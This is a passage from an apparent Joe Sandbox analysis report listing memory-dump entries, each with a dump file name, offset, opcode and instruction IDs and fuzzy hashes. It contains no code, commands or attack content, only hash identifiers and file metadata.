                                                                                                                                                  • Instruction ID: d211a4cda645f531a6cc65e9b4b1d61912e7a7ffb40d83066faf1b6daee874b8
                                                                                                                                                  • Opcode Fuzzy Hash: 9f7ff9cf5de7d200940194ded6ef5d33f4f92899e058b9373bcd7b7beba2fb8a
                                                                                                                                                  • Instruction Fuzzy Hash: 85112C70D0010A9FDB44EFA9D580A9EBBF2FB49304F10D5B9D014AB364EB345E499F81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5fa19dcad2205468f3fafb682777cde56e6e90be90756777e358326aabb2094a
                                                                                                                                                  • Instruction ID: 9b34b160a70493c655e8b9675630263e69f2929765c421db83189902a0d78307
                                                                                                                                                  • Opcode Fuzzy Hash: 5fa19dcad2205468f3fafb682777cde56e6e90be90756777e358326aabb2094a
                                                                                                                                                  • Instruction Fuzzy Hash: 3201D833700215ABCB129D999C10BAF3FDAFBC8660F148025F505EB2C4DE798D525794
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cb245277b6b6b1be3f8a9fd7670442ada74b80f2867c0fab5ffe3c1361104100
                                                                                                                                                  • Instruction ID: 7b296a07528b7122e45c5458a007595ba14099b2840a9c94457814d39dbc3825
                                                                                                                                                  • Opcode Fuzzy Hash: cb245277b6b6b1be3f8a9fd7670442ada74b80f2867c0fab5ffe3c1361104100
                                                                                                                                                  • Instruction Fuzzy Hash: A2F096313006104B97267A2ED854A2EBADEFFC9A65355407BFA09DF365EE21CC03C790
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 23b55ed24ecc886cd2e61954c25481075147f12154a66880262e5c6b1712d659
                                                                                                                                                  • Instruction ID: f9aea99c9f24829967a455df1a4f51f814ed561dd733a9f417eb729ff8bab068
                                                                                                                                                  • Opcode Fuzzy Hash: 23b55ed24ecc886cd2e61954c25481075147f12154a66880262e5c6b1712d659
                                                                                                                                                  • Instruction Fuzzy Hash: C401DB74D0020AAFDB40DFA4D845AAEBBB1FB88310F108425E915B3350D7786E56DF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 87833884093fc837012941744609df4c03724d7d4888478c6ca2643b3c19209a
                                                                                                                                                  • Instruction ID: 48f7bd495bcf437292388b659fea79a94d23ee964b3214a535dd02352929b628
                                                                                                                                                  • Opcode Fuzzy Hash: 87833884093fc837012941744609df4c03724d7d4888478c6ca2643b3c19209a
                                                                                                                                                  • Instruction Fuzzy Hash: 42E0C232E2022A97CB00EAA5DC008EFF738EEC2624B804226D59833140EB306659C2A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b284376594b6e327687a8c9d0b4023699aa5988873814f2e38ed127f10635513
                                                                                                                                                  • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                  • Opcode Fuzzy Hash: b284376594b6e327687a8c9d0b4023699aa5988873814f2e38ed127f10635513
                                                                                                                                                  • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e8838141dc8600dd26442e158c8874eabaea59dd2696d9cf45a23ada77f0bd1b
                                                                                                                                                  • Instruction ID: ab13760e1c65f48960925a7c93487966a108ff256277494be9fdf1f7af3f136b
                                                                                                                                                  • Opcode Fuzzy Hash: e8838141dc8600dd26442e158c8874eabaea59dd2696d9cf45a23ada77f0bd1b
                                                                                                                                                  • Instruction Fuzzy Hash: 6CD05E360843064EC342B7B4ED25795BB6AF780230F248930E0059B29ADEAC9EC94660
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 552f0ddb2be5d8addb551f67c555518a9587257b57d80ffc25cf7cc17b68d507
                                                                                                                                                  • Instruction ID: 365a9e2efeaccd037c9fc7552928ee3bdb86a9c63ac5c8dce1f95e1d534eab8b
                                                                                                                                                  • Opcode Fuzzy Hash: 552f0ddb2be5d8addb551f67c555518a9587257b57d80ffc25cf7cc17b68d507
                                                                                                                                                  • Instruction Fuzzy Hash: B2D0173AB00008DFCB008F88E8808DDF7B6FB98320B048016E911A3220CA319921CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 242788cfe6106c1dca98938e91704238bf922fb52c450620150408aa275e06df
                                                                                                                                                  • Instruction ID: 1f5049ac27ed6c95f1f1358b77ccb3d0f07bfd0a68c98e2a3ec78964ad328a82
                                                                                                                                                  • Opcode Fuzzy Hash: 242788cfe6106c1dca98938e91704238bf922fb52c450620150408aa275e06df
                                                                                                                                                  • Instruction Fuzzy Hash: C3C012310443194EC681FB65ED55555772EF7D0210B508930A0051A69DDF7D5D894790
                                                                                                                                                  Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abc1ac02471b02d48353eb80cfc78d2088552f0947865bb2981af3347e179152
• Instruction ID: 12d14f580afe267290e0c19d38b86f8a823cd43d8575df4dabbbab2f3ed59b1d
• Opcode Fuzzy Hash: abc1ac02471b02d48353eb80cfc78d2088552f0947865bb2981af3347e179152
• Instruction Fuzzy Hash: D2C1AF74E00218CFDB54DFA9C944B9DBBB2BF89304F2081A9D809AB365DB359E85CF51

Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 95703dd6f414f87ec8b38059fcc26b29a463e762d4aba72f5b1f4a4546365e22
• Instruction ID: 7c8d5a563ab7d9e15059dbd86337eba82e7769aaa34f00aeac414ea9ddc007df
• Opcode Fuzzy Hash: 95703dd6f414f87ec8b38059fcc26b29a463e762d4aba72f5b1f4a4546365e22
• Instruction Fuzzy Hash: F7513570D01209DBDB14EFA9D4847ADBBB2FB8C310F14D52AD405BB294DB79A981CF64

Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: baa79c873aa778a1986d7062c8d4183b05814390ea7a0ef16e7b0898cc667f6e
• Instruction ID: 72058f58f8e4303edd121d3ab2349b79b085a5b1caf565957d947cdf6c909a2b
• Opcode Fuzzy Hash: baa79c873aa778a1986d7062c8d4183b05814390ea7a0ef16e7b0898cc667f6e
• Instruction Fuzzy Hash: 76510370D05209DFDB10EFA8E4846ADBBB2FB4D310F24956AD405BB295DB79A881CF60

Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8fd41f7ee0f2fd2ef639cbe4981531c50be84d640338779082b41df51867b5f
• Instruction ID: a1f0c7579b8dfdcfe22f6dd908c32e8948e0e8d026f1ac8a71790855eca316e5
• Opcode Fuzzy Hash: c8fd41f7ee0f2fd2ef639cbe4981531c50be84d640338779082b41df51867b5f
• Instruction Fuzzy Hash: E051F570D01209DFDB10EFA8D4847ADBBB2FB4D310F24952AD415BB294DB79A981CF64

Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: \;^q$\;^q$\;^q$\;^q
• API String ID: 0-3001612457
• Opcode ID: 7b688df70e9386837475fdf8cacf29607b0f18897b44fbe80843eb9bb7a074f1
• Instruction ID: 219e8696a7e7f2859223e31aaa103a96a5a99c750df4f5aa2f17fecefc55aca4
• Opcode Fuzzy Hash: 7b688df70e9386837475fdf8cacf29607b0f18897b44fbe80843eb9bb7a074f1
• Instruction Fuzzy Hash: 9901F231B401048FCB24AE2CC544EAA77EBBF88B60725486AE546EF3F5DB31DC418740